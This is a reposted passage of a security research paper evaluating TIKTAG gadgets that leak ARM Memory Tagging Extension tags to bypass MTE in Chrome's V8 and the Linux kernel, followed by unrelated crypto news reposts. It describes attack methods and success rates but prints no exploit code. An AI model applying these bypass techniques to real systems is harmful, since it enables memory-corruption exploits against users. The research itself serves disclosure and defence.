This study shows that ARM’s Memory Tagging Extension can be reliably bypassed in Chrome and the Linux kernel through speculative tag leakage, enabling real-worldThis study shows that ARM’s Memory Tagging Extension can be reliably bypassed in Chrome and the Linux kernel through speculative tag leakage, enabling real-world

Why Hardware Memory Tagging Isn’t the Security Silver Bullet It Promised to Be

Abstract

1. Introduction

2. Background

  • Memory Tagging Extension
  • Speculative Execution Attack

3. Threat Model

4. Finding Tag Leakage Gadgets

  • Tag Leakage Template
  • Tag Leakage Fuzzing

5. TIKTAG Gadgets

  • TIKTAG-v1: Exploiting Speculation Shrinkage
  • TIKTAG-v2: Exploiting Store-to-Load Forwarding

6. Real-World Attacks

6.1. Attacking Chrome

7. Evaluation

8. Related work

9. Conclusion And References

\

Evaluation

In this section, we evaluate the TIKTAG gadgets and MTE bypass exploits in two MTE-enabled systems, the Chrome browser (§7.1) and the Linux kernel (§7.2). All experiments were conducted on the Google Pixel 8 devices.

\ 7.1. Chrome Browser Tag Leakage

We evaluated the TIKTAG-v2 gadget in the V8 JavaScript engine in two environments:

i) the standalone V8 JavaScript engine, and

ii) the Chromium application. The V8 JavaScript engine runs as an independent process, reducing the interference from the Android platform. The Chromium application runs as an Android application, subject to the Android’s application management such as process scheduling and thermal throttling. The experiments were conducted with the V8 v12.1.10 and Chromium v119.0.6022.0 release build.

\ We leveraged MTE random tagging schemes provided by the underlying allocators (Table 1). The standalone V8 used the Scudo allocator [3] (i.e., Android default allocator), which supports 16 random tags for random tagging and offers the OddEvenTags option. When OddEvenTags is enabled, Scudo alternates odd and even random tags for neighboring objects, preventing linear overflow (i.e., OVERFLOWTUNING). When OddEvenTags is disabled, Scudo utilizes all 16 random tags for every object to maximize tag entropy for use-afterfree detection (i.e., UAFTUNING).

\ By default, OddEvenTags is enabled, while we evaluate both settings. Upon releasing an object, Scudo sets a new random tag that does not collide with the previous one. PartitionAlloc (i.e., Chrome default allocator) utilizes 15 random tags and reserves the tag 0x0 for unallocated memory. When releasing an object, PartitionAlloc increments the tag by one, making the tag of the re-allocated memory address predictable. However, in real-world exploits, it is challenging to precisely control the number of releases for a specific address, thus we assume the attacker still needs to leak the tag after each allocation.

\ For the evaluation, we constructed the TIKTAG-v2 gadget in JavaScript (Figure 6) and developed MTE bypass attacks as described in §6.1.3. These attacks exploit artificial vulnerabilities designed to mimic real-world renderer vulnerabilities, specifically linear overflow [44] and use-after-free [42]. We developed custom JavaScript APIs to allocate, free, locate, and access the renderer object to manipulate the memory layout and trigger the vulnerabilities. It’s worth noting that our evaluation shows the best-case performance of MTE bypass attacks since real-world renderer exploits involve

additional overheads in triggering the vulnerabilities and controlling the memory layout.

\ V8 JavaScript Engine. In the standalone V8 JavaScript engine, we evaluated the tag leakage of the TIKTAG-v2 gadget with cache eviction and a memory-based timer. For cache eviction, we used an L1 index-based random eviction set, 500 elements for slow[0] and probe[PROBE_OFFSET], 300 elements for victim.length. The eviction performance of the random eviction set varies on each run, so we repeated the same test 5 times and listed the best result.

\ The random eviction can be optimized with eviction set algorithms [70]. We used a memory counter-based timer with a custom worker thread incrementing a counter, which is equivalent to the SharedArrayBuffer timer [58]. For all possible tag guesses (i.e., 0x0-0xf), we measured the access latency of probe[PROBE_OFFSET] after the gadget 256 times and determined the guessed tag with the minimum average access latency as the correct tag.

\ Table 2 summarizes the MTE bypass exploit results in V8. For a single tag leakage, the gadget was successful in all 100 runs (100%), with an average elapsed time of 3.04 seconds. MTE bypass exploits were evaluated over 100 runs for each vulnerability and OddEvenTags configuration (i.e., disabled (0) and enabled (1)). We excluded linear overflow exploit with OddEvenTags enabled, since the memory corruption is always detected with spatially adjacent objects tagged with different tags and the attack would always fail.

\ The results demonstrate that the attacks were successful in over 97% of the runs, with an average elapsed time of 6 to 13 seconds. In use-after-free exploits, enabling OddEvenTags decreased the average elapsed time by around 40%, due to the decrease in tag entropy from 16 to 8, doubling the chance of tag collision between the temporally adjacent objects.

\ Chromium Application. In the Chromium application setting, we evaluated the TIKTAG-v2 gadget with cache flushing and a SharedArrayBuffer-based timer. Unlike V8, random eviction did not effectively evict cache lines, so we manually flushed the cache lines with dc civac instruction. We attribute this to the aggressive resource management of Android, which can be addressed in the future with cache eviction algorithms tailored for mobile applications.

\ To measure the cache eviction set overhead, we included the cache eviction set traversals in all experiments, using the same cache eviction configuration of the V8 experiments. We measured access latency with a SharedArrayBuffer-based timer as suggested by web browser speculative execution studies [8, 21]. The MTE bypass exploits experiments were conducted in the same manner as the V8 experiments. Table 3 shows the MTE bypass exploit results in the Chromium application.

\ The tag leakage of the TIKTAG-v2 gadget in the Chromium application was successful in 95% of 100 runs, with an average elapsed time of 2.54 seconds. With the MTE bypass exploits, success rates were over 95% for both vulnerability types, with an average elapsed time of 16.11 and 21.90 seconds for linear overflow and use-afterfree, respectively.

\ 7.2. Linux Kernel Tag Leakage

The experiments were conducted on the Android 14 kernel v5.15 using the default configuration. We used 15 random tags (i.e., 0x0–0xe) for kernel objects, as tag 0xf is commonly reserved for the access-all tag in the Linux kernel [37]. The cache line eviction of kernel address cond_ptr to trigger the speculative execution was achieved by cache line bouncing [25] from the user space.

\ For cache measurement, we utilized the virtual counter (i.e., CNTVCT_EL0) to determine the cache hit or miss with the threshold 1.0, which is accessible from the user space. As the virtual counter has a lower resolution (24.5MHz) than the CPU cycle frequency (2.4-2.9 GHz), the accuracy of the cache hit rate is lower than the physical CPU counter-based measurements in §5. The access time was measured in the user space or kernel space, depending on the experiment.

\ Kernel Context Evaluation. We first evaluated whether TIKTAG gadgets can leak MTE tags in the Linux kernel context (Figure 11). We created custom system calls containing TIKTAG-v1 (Figure 2) and TIKTAG-v2 (Figure 6) gadgets and executed them by calling the system calls from the user space. In CHECK, we accessed the guessptr that holds either the correct or wrong tag Tg. In TEST, testptr pointed to

\ either a kernel address or a user space address, depending on whether the cache state difference was measured in the kernel or user space. When we leveraged a user space address as testptr, we passed a user buffer pointer to the kernel space as a system call argument and accessed the pointer in TEST using copyto_user(). The user space address was flushed in the user space before the system call invocation, and the cache state was measured after the system call returned.

\ When we used a kernel address as test_ptr, the cache flush and measurement were performed in the kernel. Each experiment measured the access time over 1000 runs. When executing TIKTAG-v1 in the kernel context, the MTE tag leakage was feasible in both the kernel and user space, where the user space measurement results are shown in Figure 11a.

\ Compared to the user space gadget evaluation (Figure 3), the kernel context required more loads in CHECK to distinguish the cache state difference. Specifically, the cache state difference was discernible from 4 loads in the kernel context, while the user space context required only 2 loads.

\ This can be attributed to the noises from the kernel to the user space context switch overhead, such that the cache hit rates of the tag match cases were lower (i.e., under 90%) than the user space gadget evaluation (i.e., 100%). When executing the TIKTAG-v2 gadget in the kernel space, MTE tag leakage was observed only in the kernel space (Figure 11b).

\ When we measured the access latency of test_ptr in the user space, the gadget did not exhibit a cache state difference. Although the TIKTAG-v2 gadget might not be directly exploitable in the user space, cache state amplification techniques [21, 72] could be utilized to make it observable from the user space.

\ Kernel MTE Bypass Exploit. We evaluated MTE bypass exploits in the Linux kernel with two TIKTAG-v1 gadgets: an artificial TIKTAG-v1 gadget with 8 loads in CHECK (i.e., artificial) and a real-world TIKTAG-v1 gadget in sndtimeruserread() (Figure 10). The artificial gadget evaluates the best-case performance of MTE bypass attacks, while the sndtimeruserread() gadget demonstrates realworld exploit performance.

\ Both gadgets were triggered by invoking the system call containing the gadget from the user space, leveraging a user space address as testptr, and measuring the access latency of testptr in user space. We conducted a tag leakage attack and MTE bypass attack for each gadget. For the MTE bypass attack, we synthesized a buffer overflow vulnerability.

\ Each gadget dereferenced the vulnerable pointer (i.e., guess_ptr) to trigger tag checks; an out-of-bounds pointer and a dangling pointer for the buffer overflow and use-after-free exploits, respectively. The exploit methodology followed the process described in §D.

\ summarizes the MTE bypass exploit results. For a single tag leakage, the gadgets successfully leaked the correct tag in all 100 runs (100%), with an average elapsed time of 0.12 seconds in the artificial gadget, and 3.38 seconds in the sndtimeruser_read() gadget. The MTE bypass exploit for the artificial TIKTAG-v1 gadget was successful in all 100 runs (100%), with an average elapsed time of 0.18 seconds.

\ Regarding the MTE bypass exploit for the sndtimeruserread() gadget, the success rate was 97% with an average elapsed time of 6.86 seconds. As the sndtimeruserread() gadget involves complex kernel function calls and memory accesses, the performance of the MTE bypass exploit is slightly lower compared to the artificial gadget. Nevertheless, it still demonstrates a high success rate within a reasonable time frame.

:::info Authors:

  1. Juhee Kim
  2. Jinbum Park
  3. Sihyeon Roh
  4. Jaeyoung Chung
  5. Youngjoo Lee
  6. Taesoo Kim
  7. Byoungyoung Lee

:::

:::info This paper is available on arxiv under CC 4.0 license.

:::

\

Market Opportunity
Threshold Logo
Threshold Price(T)
$0.009178
$0.009178$0.009178
-0.13%
USD
Threshold (T) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact [email protected] for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.

You May Also Like

The Channel Factories We’ve Been Waiting For

The Channel Factories We’ve Been Waiting For

The post The Channel Factories We’ve Been Waiting For appeared on BitcoinEthereumNews.com. Visions of future technology are often prescient about the broad strokes while flubbing the details. The tablets in “2001: A Space Odyssey” do indeed look like iPads, but you never see the astronauts paying for subscriptions or wasting hours on Candy Crush.  Channel factories are one vision that arose early in the history of the Lightning Network to address some challenges that Lightning has faced from the beginning. Despite having grown to become Bitcoin’s most successful layer-2 scaling solution, with instant and low-fee payments, Lightning’s scale is limited by its reliance on payment channels. Although Lightning shifts most transactions off-chain, each payment channel still requires an on-chain transaction to open and (usually) another to close. As adoption grows, pressure on the blockchain grows with it. The need for a more scalable approach to managing channels is clear. Channel factories were supposed to meet this need, but where are they? In 2025, subnetworks are emerging that revive the impetus of channel factories with some new details that vastly increase their potential. They are natively interoperable with Lightning and achieve greater scale by allowing a group of participants to open a shared multisig UTXO and create multiple bilateral channels, which reduces the number of on-chain transactions and improves capital efficiency. Achieving greater scale by reducing complexity, Ark and Spark perform the same function as traditional channel factories with new designs and additional capabilities based on shared UTXOs.  Channel Factories 101 Channel factories have been around since the inception of Lightning. A factory is a multiparty contract where multiple users (not just two, as in a Dryja-Poon channel) cooperatively lock funds in a single multisig UTXO. They can open, close and update channels off-chain without updating the blockchain for each operation. Only when participants leave or the factory dissolves is an on-chain transaction…
Share
BitcoinEthereumNews2025/09/18 00:09
Gold Hits $3,700 as Sprott’s Wong Says Dollar’s Store-of-Value Crown May Slip

Gold Hits $3,700 as Sprott’s Wong Says Dollar’s Store-of-Value Crown May Slip

The post Gold Hits $3,700 as Sprott’s Wong Says Dollar’s Store-of-Value Crown May Slip appeared on BitcoinEthereumNews.com. Gold is strutting its way into record territory, smashing through $3,700 an ounce Wednesday morning, as Sprott Asset Management strategist Paul Wong says the yellow metal may finally snatch the dollar’s most coveted role: store of value. Wong Warns: Fiscal Dominance Puts U.S. Dollar on Notice, Gold on Top Gold prices eased slightly to $3,678.9 […] Source: https://news.bitcoin.com/gold-hits-3700-as-sprotts-wong-says-dollars-store-of-value-crown-may-slip/
Share
BitcoinEthereumNews2025/09/18 00:33
AI in Sports: The Controversial Experiment of the Oakland Ballers’ AI Manager

AI in Sports: The Controversial Experiment of the Oakland Ballers’ AI Manager

BitcoinWorld AI in Sports: The Controversial Experiment of the Oakland Ballers’ AI Manager In the rapidly evolving landscape of technology, the boundaries of innovation are constantly being pushed. For those immersed in the world of cryptocurrency and blockchain, the concept of decentralized decision-making and experimental technology is familiar territory. So, when an independent baseball team decided to let an AI manage a game, it naturally sparked a fascinating conversation. This bold move by the Oakland Ballers wasn’t just about baseball; it was a profound experiment in AI in sports, echoing the spirit of disruption and questioning traditional structures that resonates deeply within the tech community. The Mathematical Heart of Baseball and the Rise of AI in Sports Baseball, often called America’s pastime, is more than just a game of skill and athleticism; it’s a deeply mathematical sport. Every pitch, every swing, every defensive shift can be broken down into granular statistics. Major League teams employ legions of data engineers to crunch numbers, seeking minute advantages that can influence managerial decisions. This data-driven approach, while effective, sometimes leads to an almost absurd level of overanalysis, reminiscent of Mr. Burns in that classic Simpsons episode, who famously pulled an eight-time all-star for Homer Simpson based on ‘playing the percentages.’ This deep analytical foundation makes baseball a prime candidate for technological experimentation, especially with artificial intelligence. The integration of AI in sports isn’t just a futuristic fantasy; it’s becoming a tangible reality, promising to optimize strategies, enhance player performance analysis, and even redefine the role of human coaches. From predictive analytics for player injuries to real-time strategic adjustments, AI offers a new lens through which to view and manage athletic competition. The Oakland Ballers, with their independent spirit, decided to take this concept further than most, venturing into uncharted territory. The Oakland Ballers’ Bold Experiment with Baseball AI The story of the Oakland Ballers is one of resilience and innovation. Founded by edtech entrepreneur Paul Freedman, the Ballers emerged as a beacon of hope for Oakland baseball fans after the painful departure of the Major League A’s. Though a minor league team, the ‘Oakland B’s’ quickly garnered a national following, winning a title in just two seasons. This unique position—a major league team in a minor league market—gave them the freedom to experiment in ways larger leagues couldn’t. Freedman explained to Bitcoin World, "We can play with things and experiment with things way before the MLB or NBA or any of those leagues could do something." This experimental ethos led them to a groundbreaking partnership with Distillery, an AI company, to develop software capable of managing a baseball game in real time. The core of this initiative was to see how a sophisticated Baseball AI could perform under live game conditions. Unlike previous fan-controlled experiments where humorous decisions often trumped strategic ones, this AI initiative aimed for pure data-driven optimization. The implications of such an experiment extend beyond the diamond, touching upon how artificial intelligence might reshape various industries, including those reliant on complex, real-time decision-making. Navigating AI Decision-Making on the Field The choice of baseball for this AI experiment was deliberate. As Freedman noted, "Baseball is the perfect place to do an initial experiment like this, because it is so data-driven, and decisions are made very analytically." The slow pace between pitches allows ample time for an AI system to process data and recommend actions. Distillery trained OpenAI’s ChatGPT on an immense dataset, including over a century of baseball statistics and specific Ballers game data, to mimic the strategic thinking of their human manager, Aaron Miles. The goal wasn’t to replace human ingenuity but to augment it. Freedman clarified, "What the AI did was figure out what our human coach would have done – the ingenuity on strategy and the concepts came from [Miles], and the ability to use the data and recognize patterns… is what the AI did throughout the course of the game." This highlights a critical distinction in the current state of AI decision-making: AI as a powerful tool for optimization, rather than an autonomous replacement for human expertise. During the AI-controlled game, the system performed remarkably, making almost identical decisions to Miles regarding pitching changes, lineup adjustments, and pinch hitters. The only instance where Miles had to intervene was due to a player’s unexpected illness, a scenario outside the AI’s programmed scope. This singular override underscores the enduring necessity of human oversight for unforeseen circumstances and ethical considerations. The manager himself, Aaron Miles, embraced the experiment with good humor, even offering the tablet running the AI for a handshake with the opposing manager, a symbolic gesture of technology meeting tradition. Aspect Human Manager (Aaron Miles) AI Manager (Distillery’s AI) Decision-making Basis Experience, intuition, real-time observation, data analysis Centuries of baseball data, Ballers’ game history, pattern recognition via ChatGPT Key Decisions Made Pitching changes, lineup construction, pinch hitters Identical decisions to Miles for pitching changes, lineup, pinch hitters Override Instances Miles overrode AI once due to player illness Required human override for unexpected player health issue Outcome of Game Smooth execution of managerial strategy Smooth execution, mirroring human decisions The Critical Role of Fan Engagement and Backlash Despite the smooth execution of the AI’s managerial duties, the experiment triggered an unexpected wave of backlash from the Oakland Ballers’ dedicated fanbase. For many, the involvement of companies like OpenAI, which powered Distillery’s AI, felt like a betrayal. Fans expressed concerns that such enterprises prioritize "winning" the AI race over thorough safety testing and ethical deployment. This sentiment was amplified by the recent history of corporate greed that led to the departure of multiple professional sports franchises from Oakland, creating a deep-seated mistrust among locals. Comments like "There goes the Ballers trying to appeal to Bay Area techies instead of baseball fans" highlighted a perceived disconnect. The issue wasn’t just about AI; it was about the broader cultural tension between technological advancement and community values. Fan engagement, crucial for any sports team, proved to be a double-edged sword. While fans had previously embraced novel concepts like fan-controlled games, the AI experiment touched a nerve related to corporate influence and the perceived erosion of authenticity. Paul Freedman acknowledged the unforeseen negative reaction, stating, "It never feels good to have your fans be like, ‘We hate this.’" The Ballers do not intend to repeat this specific AI experiment. However, the experience sparked a vital conversation about the ethical implications and societal acceptance of new technologies. This public discourse, though initially uncomfortable, is essential for navigating the complex future of AI. It underscores that while technology can optimize processes, the human element—emotion, community, and trust—remains paramount. A Look Ahead: Balancing Innovation and Community in the Age of AI The Oakland Ballers’ experiment serves as a compelling case study in the ongoing dialogue surrounding artificial intelligence. It showcased the impressive capabilities of AI in sports for data-driven strategy while simultaneously revealing the critical importance of public perception and fan engagement. The journey of the Oakland Ballers, from a team born out of protest to pioneers in sports technology, reflects a broader societal challenge: how to embrace innovation without alienating the communities it serves. As AI continues to integrate into various aspects of life, including sports and even the financial sector where cryptocurrencies thrive, understanding its practical applications and potential pitfalls becomes increasingly vital. The Ballers’ experience reminds us that while AI can be an incredible tool for optimization, the human touch, ethical considerations, and genuine connection with stakeholders are indispensable. The conversation about AI’s role in our future has just begun, and experiments like these, even with their bumps, are crucial steps in shaping that dialogue responsibly. To learn more about the latest AI in sports trends, explore our article on key developments shaping AI features, institutional adoption, and future applications. This post AI in Sports: The Controversial Experiment of the Oakland Ballers’ AI Manager first appeared on BitcoinWorld.
Share
Coinstats2025/09/23 04:45